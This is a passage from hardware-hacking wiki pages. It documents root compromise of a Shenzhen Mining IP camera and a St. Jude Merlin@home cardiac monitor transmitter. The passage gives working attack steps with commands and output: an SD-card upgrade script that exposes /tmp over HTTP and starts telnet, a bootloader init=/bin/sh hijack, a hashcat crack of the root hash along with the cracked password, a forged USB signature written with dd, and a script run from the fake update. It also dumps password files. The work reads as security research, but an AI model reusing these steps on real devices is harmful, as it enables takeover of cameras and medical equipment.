rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ cat _D340D.extracted/_1A100.extracted/cpio-root/root/welcome.txt
welcome to (c)shenzhen mining mipc world!
enjoy it!</pre>

And the config storage.

<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls jffs2-root/fs_1/ -R
jffs2-root/fs_1/:
dev_data ipc_data latest_dhcp_ip_eth0 system_data

jffs2-root/fs_1/dev_data:
system_config

jffs2-root/fs_1/ipc_data:
8188eu_ap_2G.conf aec_amr.xml ao0.xml buildinfo.xml io_alert.xml motion_alert.xml ntp_info.xml ptz0.xml RT2870AP.dat vec_half.xml vs0.xml
action_conf.xml aec_g711.xml aoc0.xml data_version ipc_conf.xml motion_ex_alert.xml osd_show_time.xml ptz.xml RT2870STA_adhoc.dat vec_hd.xml vsc0.xml
active_server.xml aec_g726.xml ap.conf default_gw.xml license.xml net_info.sh pass.mp ra0.xml RT2870STA_infra.dat vec_jpeg.xml
aec_aac.xml alarm.xml as0.xml dps localtime net_info.xml pass.up recording_root.xml sd_conf.xml vec_min.xml
aec_adpcm.xml alert_device_conf.xml asc3.xml eth0.xml mediainfo.xml nick_conf.xml proxy.xml recording_task.xml server.xml vec_normal.xml

jffs2-root/fs_1/ipc_data/dps:
cacs

jffs2-root/fs_1/ipc_data/dps/cacs:
61646d696e02

jffs2-root/fs_1/system_data:</pre>

Theres also an archive in /project on the root filesystem.

<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root$ ls -laht project/

total 3.2M
drwxr-xr-x 2 rjmendez rjmendez 4.0K Apr 20 12:17 .
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml</pre>

Its called by the init script in /etc/init.d/dev_init.sh

<pre>#prepare project
unlzma -c /project/*.tar.lzma > /tmp/project.tar
rm /project/*.tar.lzma

...

tar -xvf /tmp/project.tar -C /project/
rm -rf /tmp/project.tar
chmod -R 777 /project

#dev_start
if [ -e /mnt/mtd/flag_debug_dev_start ]; then
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" /mnt/mtd/flag_debug_dev_start existed
else
echo "[`date '+%Y-%m-%d %H:%M:%S'` dev_init.sh]" run /project/apps/app/ipc/data/sh/dev_start.sh
cd /project/apps/app/ipc/data/sh
./dev_start.sh
fi</pre>

Extracting it all gives us this.

<pre>rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ unlzma -c ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma > project.tar
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ tar -xf project.tar
rjmendez@Rjmendez:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted/_D340D.extracted/_1A100.extracted/cpio-root/project$ ls -laht
total 14M
drwxr-xr-x 5 rjmendez rjmendez 4.0K Apr 20 14:03 .
-rw-rw-r-- 1 rjmendez rjmendez 11M Apr 20 14:02 project.tar
-rwxr-xr-x 1 rjmendez rjmendez 3.2M Apr 20 12:17 ipc_project_v1.9.5.1510231507.rtl8188.tar.lzma
-rwxr-xr-x 1 rjmendez rjmendez 11 Apr 20 12:17 tar.crc
drwxrwxr-x 15 rjmendez rjmendez 4.0K Apr 20 12:17 ..
-rwxr-xr-x 1 rjmendez rjmendez 135 Apr 20 12:17 buildinfo.xml
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 apps
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 platforms
drwxr-xr-x 3 rjmendez rjmendez 4.0K Oct 23 2015 faraday
-rw-r--r-- 1 rjmendez rjmendez 2 Oct 23 2015 kernel_version</pre>

Tons of good data in here!

'''Gaining root'''

We have a great entry point as well inside of /project/apps/app/ipc/data/sh/sd_card_insert.sh.

<pre>#!/bin/sh

#mount sd_card
if [ ! -d /mnt/sd ]; then
/bin/mkdir /mnt/sd
fi
mount -o noatime,nodiratime,norelatime -t vfat /dev/mmcblk0p1 /mnt/sd

#run hook
if [ -e /mnt/sd/upgrade/upgrade.sh ]; then
chmod 777 /mnt/sd/upgrade/upgrade.sh
sh /mnt/sd/upgrade/upgrade.sh &
fi

wget http://127.0.0.1:80/ccm/CcmNotifyRequest/-dvalue-1.xml -O 1.xml

rm -f 1.xml</pre>

What the hell is going on in /project/apps/app/ipc/data/sh/dev_passwd.sh?

<pre>path_prompt=/tmp/prompt.debug
path_pass=/tmp/pass.debug

...

#Generate ctx if needed
if [ -z $ctx ]; then
ctx_file=/tmp/ctx.dev
if [ -e $ctx_file ]; then
read ctx < $ctx_file
fi

if [ -z $ctx ]; then
ctx=$RANDOM
echo $ctx > $ctx_file
fi
fi

...

${bindir}/mipc_tool -cmd pass -devid ${devid} -prompt ${path_prompt} -pass ${path_pass}

...

read pass < $path_pass
read prompt < $path_prompt
echo "pass=${pass}, prompt=${prompt}"
/bin/hostname ${prompt}${promp_eth}${promp_wifi}
echo "root:${pass}"|chpasswd</pre>

It looks like they are generating a new root password after rebooting. Everything is still running as root and the password is in a file at /tmp/pass.debug, we should be able to get in over the serial line but that’s not very sexy.
A look into /project/apps/app/ipc/data/sh/dev_telnet.sh gives us another option.

<pre>#!/bin/sh

port=9527
file_flag=/mnt/mtd/flag_debug_telnet
if [ -e ${file_flag} ]; then
mode=on
fi

usage()
{
echo Usage:$0 [-m,--mode on/off] [-h,--help]
exit
}

ARGS=`getopt -a -o m:h -l mode:,help -- "$@"`

#set -- "${ARGS}"
eval set -- "${ARGS}"

while true
do
case "$1" in
-m|--mode)
mode="$2"
shift
;;
-h|--help)
usage
;;
--)
shift
break
;;
esac
shift
done

if [ x"${mode}" == xon ]; then
if [ ! -e ${file_flag} ]; then
touch ${file_flag}
fi

if [ "" == "`ps -w | grep telnet | grep ${port} | grep -v grep`" ]; then
telnetd -p ${port} &
fi
elif [ x"${mode}" == xoff ]; then
if [ -e ${file_flag} ]; then
rm ${file_flag}
fi

ps w| grep telnetd | grep ${port} | grep -v -E "grep" | while read line
do
pid=${line%% *}
kill -9 $pid
done
fi</pre>

Well well well… Lets create an upgrade folder and throw in this script inside of upgrade.sh on our vfat formatted micro sd card.

<pre>#!/bin/sh
sleep 45
cd /project/apps/app/ipc/data/http/ && ln -s /tmp &
/project/apps/app/ipc/data/sh/dev_telnet.sh -m on</pre>

After a little bit we should see this show up on the web server.

<pre>rjmendez@Rjmendez:~/cloudipcamera$ curl http://192.168.187.254/tmp/pass.debug
264e37dcd841b35344c68e8f95dc8b11</pre>

And then we can try telnet on the nonstandard debug port.

<pre>rjmendez@Rjmendez:~/cloudipcamera$ telnet 192.168.187.254 9527
Trying 192.168.187.254...
Connected to 192.168.187.254.
Escape character is '^]'.

1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254 login: root
Password:
|---------------------------------------------------------------------------|
| A |
| AAA |
| AAAAA |
| AAAAAAA |
| AAAA AA |
| A AAAA AA |
| AAA AAAA AA AAA AAAAA AAA AAAAA AAAAA |
| AAAAA AAAA AA AA AA AA AA AA AA |
| AAAAAAAAAA AA AAA AA AA AAA AA AA AA AA |
| AAAAA AAAA AA AAA AA AA AAA AA AA AA AA |
| AAAAA A AA AAA AA AA AAA AA AA AAAAAA |
| AAAAA AA AAA AA AA AAA AA AA AA |
| AAAAAA AAAA AAA AA AA AAA AA AA AAAAAA |
|===========================================================================|
| |
| http://www.shenzhenmining.com |
| power by (C)shenzhenmining 2012 |
|---------------------------------------------------------------------------|
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# echo "Root password is '264e37dcd841b35344c68e8f95dc8b11'"
Root password is '264e37dcd841b35344c68e8f95dc8b11'
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ls -l /root
-rwxr-xr-x 1 root root 54 Oct 23 2015 welcome.txt
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /root/welcome.txt
welcome to (c)shenzhen mining mipc world!
enjoy it!
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# cat /etc/shadow
root:S5Ada/QN0yHBo:12963:0:99999:7:::
bin:*:12963:0:99999:7:::
daemon:*:12963:0:99999:7:::
adm:*:12963:0:99999:7:::
lp:*:12963:0:99999:7:::
sync:*:12963:0:99999:7:::
shutdown:*:12963:0:99999:7:::
halt:*:12963:0:99999:7:::
uucp:*:12963:0:99999:7:::
operator:*:12963:0:99999:7:::
nobody:*:12963:0:99999:7:::</pre>

This device has never been connected to the internet, lets see what’s running on it.

<pre>[root@1jfiegbp1n36a@11266@m@u@e.192.168.187.254@w.192.168.188.254]# ps | grep mipc
600 root 2532 S ./mipc_tool -cmd wd -len 20
826 root 2664 S ./mipc_tool -cmd debug -server 1
945 root 2664 S ./mipc_tool -cmd led -dev eth -interval 500
987 root 2664 S ./mipc_tool -cmd led -dev wifi -interval 500
1009 root 2668 S ./mipc_tool -cmd led -dev single -interval 500
1015 root 2664 S ./mipc_tool -cmd click_listen
1063 root 2668 S ../../../../../platforms/faraday-linux-armv5/bin/mipc_tool -cmd tcpproxy --passive-remote 127.0.0.1:23 --remote 218.14.146.199:7024:/tmp/tcp_post.txt --header-notify-file
1179 root 54140 S ./mipc -cont-conf ../../../apps/app/ipc/conf/container.conf </pre>

== Future ==

We need to look into mipc_tool and the mipc program itself.

SJM Merlin at Home

2017-08-09T19:21:23Z

Rjmendez:

__FORCETOC__
{{Disclaimer}}
[[File:Merlin-at-home-1.jpg|100px|left|thumb]]
[[Category:Medical]]
This page will be dedicated to a general overview, descriptions, and information related to the St. Jude Medical Merlin@home Transmitter Model EX1150.

== About ==
The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.

== Disassembly ==
<gallery>
File:Merlin-front.jpg
File:Merlin-back.jpg
File:Merlin-side_usb.jpg
File:Merlin-antenna1.jpg
File:Merlin-antenna2.jpg
File:Merlin-uart.jpg
File:Merlin-uart2.jpg
</gallery>

== UART ==
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.

<gallery>
File:Merlin-uart.jpg
File:Merlin-uart2.jpg
</gallery>

== Exploitation ==

This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.

<pre>Post device verification...
Serial2In string: ATi0
Serial2In string:
56000
Modem Post : Passed with retries = 0

Time taken by POST : [1.197000] seconds
nand_init: manuf=0x000000EC device=0x000000F1
scanning for bad blocks...
nand_check_blocks: nand_read_page() failed, addr=0x02B40000
nand_check_blocks: nand_read_page() failed, addr=0x04B20000
nand_check_blocks: nand_read_page() failed, addr=0x07660000

Consider yourself BLOBed!

blob version 2.0.5-pre2 for Tanto Basic Device
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.
This is free software, and you are welcome to redistribute it
under certain conditions; read the GNU GPL for details.
blob release: d20081014_platform_4_16
Memory map:
0x02000000 @ 0xc0000000 (32 MB)

ram_post executing...
Data Bus Test
Address Bus Test
Data Qualifer Test
Device Test
c0200000status_next, board type = RF board revision = (3)
c1e00000r14_svc = 0x0000034d
Autoboot in progress, press any key to stop ..
Autoboot aborted
Type "help" to get a list of commands
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=
</pre>

We can pull some useful information from the device.

<pre>sh-2.05a# cat /etc/passwd
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/usr/sbin:
sys:*:3:3:sys:/dev:
adm:*:4:4:adm:/var/adm:
lp:*:5:7:lp:/var/spool/lpd:
sync:*:6:8:sync:/bin:/bin/sync
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown
halt:*:8:10:halt:/sbin:/sbin/halt
mail:*:9:11:mail:/var/spool/mail:
news:*:10:12:news:/var/spool/news:
uucp:*:11:13:uucp:/var/spool/uucp:
operator:*:12:0:operator:/root:
games:*:13:100:games:/usr/games:
ftp:*:15:14:ftp:/var/ftp:
man:*:16:100:man:/var/cache/man:
www:*:17:100:www:/var/www:
sshd:*:18:100:sshd:/var/run/sshd:
nobody:*:65534:65534:nobody:/home:/bin/sh
sh-2.05a# cat /etc/shadow
cat: /etc/shadow: No such file or directory</pre>

Lets break this.

<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a
hashcat (v3.5.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU

OpenCL Platform #2: Intel(R) Corporation
========================================
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Precompute-Final-Permutation
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>

0q8h1Maw1oYAU:mah1200

Session..........: sjm_hash
Status...........: Cracked
Hash.Type........: descrypt, DES (Unix), Traditional DES
Hash.Target......: 0q8h1Maw1oYAU
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)
Guess.Mask.......: ?a?a?a?a?a?a?a [7]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4764729344/69833729609375 (0.01%)
Rejected.........: 0/4764729344 (0.00%)
Restore.Point....: 0/81450625 (0.00%)
Candidates.#1....: ;~9anan -> $sb~{ka
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16

Started: Sun May 07 17:39:51 2017
Stopped: Sun May 07 17:40:05 2017</pre>

Attempts to login as root fail, what was going on with that operator user?

<pre>operator:*:12:0:operator:/root:</pre>

Lets set the password to "test" and attempt logging in.

<pre>sh-2.05a# grep "operator" /etc/passwd
operator:dPUvQFLH8...A:12:0:operator:/root:</pre>

<pre>[SJM_CONFIGURATION]
VERSION=EX2000 v6.1B PR_6.56
(none) login: root
Password:
Login incorrect
2017-05-14
(none) login: operator
Password:
operator@(none):~$ whoami
operator
operator@(none):~$ su root
Password:
PAM_unix[266]: (su) session opened for user root by (uid=12)
root@(none):~# whoami
root
root@(none):~# </pre>

== Taking Things Further ==

Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.

<pre>#!/bin/bash
#
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke
# this script only if the attached USB device is a mass-storage device.
# hotplug does this by looking at the device class of the attached usb device
# See /etc/hotplug/usb.usermap. The device class for mass storage devices
# is ______
#
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to
# find the scsi ID of the attached USB storage device. It then goes on to
# find the device node corresponding to this scsi ID.
#
# version 1.1 - Added USB signature check functionality
#
# For the new cellular adapters - viz mobidata and velocity, ignore the
# mass storage interface reported. Please see comments at the top of
# /etc/hotplug/usb/velocity for details.
#
# - Ashok Iyer (16-Jun-2010)
#

export PATH=/usr/bin:/usr/local/bin:$PATH

MOUNT_PATH="/mnt/sjmpendrives"
MOUNT_NUMBER=1
LOG_FILE="/tmp/usbstorage.log"
SGMAP="sg_map"

# The functions in this script rely on "echo" to pass information to each
# other. If you need to modify this script, do not use "echo" for debugging.
# Instead use the feedback()/error_exit() functions below. These will log
# information to a log file and do not interfere with information passing
# between functions.

***snip***

function check_sign {
local node1=$1"1"
feedback "Checking signature ... "
feedback "node1 = $node1"
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501
signature=`cat /tmp/.sign`

if [ "$signature" = "SJM" ]; then
feedback "Valid pendrive"
echo 0
else
feedback "Invalid pendrive"
echo -1
fi
}

***snip***

# We only mount the first partition of a USB storage device. There is no
# requirement to mount multiple partitions. Makes the job easy :-)
function mount_scsi_dev {
local scsi_dev=$1
local mountpt=""

# check if the first partition of the device is mounted
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]"
then
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"

# FIXME- Ugly hack to detect partitions on USB flash drive
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline
# or fix devfs once and for all.
# There is another problem in devfs that after the USB flash disk is removed
# the corresponding devfs partitions (part1, part2 etc...) still show up.
foobar=`ls -l $scsi_dev | awk '{print $11}'`
dd if=/dev/$foobar of=/dev/null bs=1 count=1

# Checking USB signature
ret=`check_sign $scsi_dev`
if [ $ret -eq 0 ]; then
feedback "Valid pendrive"
else
# Tanto: Inform the Exec App to show
# an Invalid Media Error
if [ -p /tmp/remoteInt.pipe ]; then
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe
error_exit "Invalid pendrive"
else
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"
fi
fi

feedback "Mounting $scsi_dev"1" on $mountpt"
mount -t auto $scsi_dev"1" $mountpt
if [ "$?" -eq 0 ]; then
feedback "$scsi_dev"1" is now mounted on $mountpt"
feedback "Launch application specific script"
sh /etc/launch_appln.sh $mountpt
else
feedback "Mount error for $scsi_dev"
fi
else
feedback "Ignoring $scsi_dev - already mounted"
fi
}

# Find and mount all attached USB storage devices
function mount_all_attached {
local scsiuniqid=""
feedback "Find and mount all attached usb storage devices"

for scsiuniqid in $(allusb_scsiuniqid)
do
local scsidev="`diskdev_from_uniqid $scsiuniqid`"
if [ "$scsidev" == "UNKNOWN" ]; then
sleep 1
fi
mount_scsi_dev $scsidev
done
}

***snip***

# The remover script will be invoked when the device is removed. This is
# useless in a way because umount will have no effect. The only benefit is
# that the "mount" command will not show stale entries.

# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive
# which is removed ( unlike umounting all attached USB flash drives )
feedback "REM = $REMOVER"
if [ -f $REMOVER ]; then
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER
else
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER
fi

# Inform the Export data script when pendrive is unplugged.
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER
chmod a+x $REMOVER

mount_all_attached</pre>

Lets look inside of /etc/launch_appln.sh

<pre>#!/bin/sh

if [ $# -ne 1 ]; then
echo "usage: ./launch_appln.sh /mnt/pendrive"
exit
fi

# FIXME
# This script may be invoked by hotplug
# Do not run the script if it is already running
# updater or data export

mountpt=$1
script_path=/apps/tanto/

if [ -f $mountpt/version.ini ]; then
# call updater script
echo "Launching updater script"
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1
umount /mnt/sjmpendrives/1
umount /mnt/pendrive
else
umount /mnt/sjmpendrives/1
umount /mnt/pendrive
exit 0
fi
else
# Call Data export script
echo "Launching export data script"
sh $script_path/export_data.sh $mountpt
umount /mnt/sjmpendrives/1
umount /mnt/pendrive
fi</pre>

It looks like their pendrive "signature" is fairly easy to get around.

<pre>rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501
3+0 records in
3+0 records out
3 bytes copied, 0.00116472 s, 2.6 kB/s
rjmendez@Rjmendez:~/stjude_merlin$ hd /tmp/.sign
00000000 00 00 00 |...|
00000003
rjmendez@Rjmendez:~/stjude_merlin$ hd .sign_mod
00000000 53 4a 4d |SJM|
00000003
rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501
3+0 records in
3+0 records out
3 bytes copied, 0.00700994 s, 0.4 kB/s
rjmendez@Rjmendez:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501
3+0 records in
3+0 records out
3 bytes copied, 0.00123249 s, 2.4 kB/s
rjmendez@Rjmendez:~/stjude_merlin$ hd /tmp/.sign
00000000 53 4a 4d |SJM|
00000003</pre>

Adding the required files to the drive and a small script.

<pre>rjmendez@Rjmendez:/media/rjmendez/7A3B-B3C6$ ls -lahR
.:
total 36K
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini

./etc:
total 24K
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d

./etc/init.d:
total 24K
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh

rjmendez@Rjmendez:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh
#!/bin/sh
function led_off {
for i in `seq 0 7`;
do
ledControl -l$i -b0
sleep 0.05
done
}

function led_dim {
for i in `seq 0 7`;
do
ledControl -l$i -b1
sleep 0.05
done
}

function led_bright {
for i in `seq 0 7`;
do
ledControl -l$i -b2
sleep 0.05
done
}

function party_mode {
counter=0
while [ $counter -lt $1 ];
do
led_off
sleep 0.05
led_dim
sleep 0.05
led_bright
sleep 0.05
let counter=counter+1
done
}

/etc/init.d/tantoapp stop
#cp /mnt/sjmpendrives/1/passwd /etc/passwd
echo "This worked!" > /root/diditwork.txt
if [ -f /root/diditwork.txt ];
then
party_mode 15
else
echo "It did not work..."
fi</pre>

This is the output that we get from the console.

<pre>operator@(none):~$ su root
Password:
PAM_unix[265]: (su) session opened for user root by (uid=12)
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2
scsi0 : SCSI emulation for USB Mass Storage devices
Vendor: Lexar Model: USB Flash Drive Rev: 1100
Type: Direct-Access ANSI SCSI revision: 02
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)
sda: Write Protect is off
Partition check:
/dev/scsi/host0/bus0/target0/lun0: p1
modprobe: Can't locate module /dev/sg1
modprobe: Can't locate module /dev/sg2
modprobe: Can't locate module /dev/sg3
modprobe: Can't locate module /dev/sg4
modprobe: Can't locate module /dev/sg5
modprobe: Can't locate module /dev/sdb
modprobe: Can't locate module /dev/sdc
modprobe: Can't locate module /dev/sdd
modprobe: Can't locate module /dev/sde
modprobe: Can't locate module /dev/sdf
modprobe: modprobe: Can't locate module nls_cp437
modprobe: modprobe: Can't locate module nls_iso8859-1
modprobe: modprobe: Can't locate module nls_iso8859-1
modprobe: modprobe: Can't locate module nls_iso8859-1
ls /root
devel_install.sh diditwork.txt setdev.sh setlog.sh
root@(none):~# cat /root/diditwork.txt
This worked!
root@(none):~# cat /tmp/usbstorage.log
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002
REM = /var/run/usb/%proc%bus%usb%001%002
Find and mount all attached usb storage devices
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)
Use sgmap to match 0:0:0:0.
Waiting for device id to appear...
SCSI disk for 0:0:0:0 is /dev/sda
Checking /mnt/sjmpendrives/1
Mountpoint /mnt/sjmpendrives/1 is free
Checking signature ...
node1 = /dev/sda1
Valid pendrive
Valid pendrive
Mounting /dev/sda1 on /mnt/sjmpendrives/1
/dev/sda1 is now mounted on /mnt/sjmpendrives/1
Launch application specific script</pre>

== Party Mode Demo ==
{{#ev:youtube|cNcGebu8NRs}}

== Other Stuff to Look Into ==

I doubt this device has been updated to the latest firmware as I aquired it still wrapped in its packaging. As of January 2017 St. Jude Medical claims that a security patch has been applied to the newer firmware releases.

Below are some interesting things that were found.

DSA keys and known hosts.
<pre>root@(none):~# cd /root/.ssh
root@(none):~/.ssh# ls -lah
drwx------ 2 root root 0 Jan 10 2013 .
drwxrwxr-x 3 root root 0 May 15 00:10 ..
-rw------- 1 root root 668 Nov 28 2012 id_dsa
-rw-r--r-- 1 root root 601 Nov 28 2012 id_dsa.pub
-rw-r--r-- 1 root root 719 Nov 28 2012 known_hosts
root@(none):~/.ssh# cat known_hosts
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAtfdoYdn5D/vsC4Pm25jBUXDzfXrj6O50O32UONPOnvKcb08acULYcx1bDyeRGcMBqKwEJdPUKdwAT2evf4jYVSa4JvDAHQWJo15s2igWO04veEYitV5i0NEqVs+vRTJAqM70iCIKkhtoGkjBBnJcntw6u/8vgKXkvqBx85WBULc=
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29HEmKtQ5RABmAWmZ3MdyO+wiQ1GGzuNneGnPPL8KF+SYLjHXaQViB32cibA9dSauMpb8zcwj7YSxtKfu4K1gcH5vUOsqW9BgDsZYv7zWk2OHb8vLs+NT083+YbzjZvr7oGz+1/TAzfXORsN9Gf+BQMsHyjiHOjVJ/vEIy2fp0E=
REDACTED.merlin.net,150.202.X.X ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAyDjGfUubwy0y0KJw459g2L17DK4K4QAIZSvcW8hupVNK/3IrP9HSXetS69czyLISFfewq6a4ippvsbh5i+fb2C2vhHmW4N1U3zKa6vcKzUEd6j6NwUefunbSP8XBXaMoqSuN2l3nbfEeUIaVDuSk9m6uP/rVcGVQHZokPVDdpP8=</pre>

Dev scripts in /root/
<pre>root@(none):~# ls -lah /root
drwxrwxr-x 3 root root 0 May 15 00:10 .
drwxr-xr-x 20 root root 0 Jan 1 1970 ..
-rw-r--r-- 1 root root 446 Jan 1 1970 .bash_history
-rw-r--r-- 1 root root 52 Apr 24 2008 .bash_profile
drwx------ 2 root root 0 Jan 10 2013 .ssh
-r-xr-xr-x 1 root root 3.0k Nov 28 2012 devel_install.sh
-r-xr-xr-x 1 root root 483 Nov 28 2012 setdev.sh
-r-xr-xr-x 1 root root 267 Nov 28 2012 setlog.sh

root@(none):~# cat setdev.sh
#!/bin/sh

if [ $# -ne 1 ]; then
echo "usage: ./setdev.sh [1|0]"
exit
fi

if [ $1 -eq 1 ]; then
sed '1,$s/DEVELOPMENT $.*= .*$0/DEVELOPMENT \11/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf
elif [ $1 -eq 0 ]; then
sed '1,$s/DEVELOPMENT $.*= .*$1/DEVELOPMENT \10/g' /data/config/TantoParms.conf > /tmp/TantoParms.conf
cp -f /tmp/TantoParms.conf /data/config/TantoParms.conf
else
echo "Invalid argument"
fi

root@(none):~# cat setlog.sh
#!/bin/sh

if [ $# -ne 1 ]; then
echo "usage: ./setlog.sh [1|0]"
exit
fi

if [ $1 -eq 1 ]; then
touch /data/config/.tantolog
touch /data/config/.dcllog
elif [ $1 -eq 0 ]; then
rm /data/config/.tantolog
rm /data/config/.dcllog
else
echo "Invalid argument"
fi

root@(none):~# cat devel_install.sh
#!/bin/sh
#
# Script to download the devel package via scp from ftp.pacesetter.com
# Username: REDACTED_USER. The script will prompt for a password which the
# user has to enter.
#
# Version 0.1 - Ashok Iyer (aiyer at sjm dot com)

# Setup the PATH. Don't assume we get a sane one
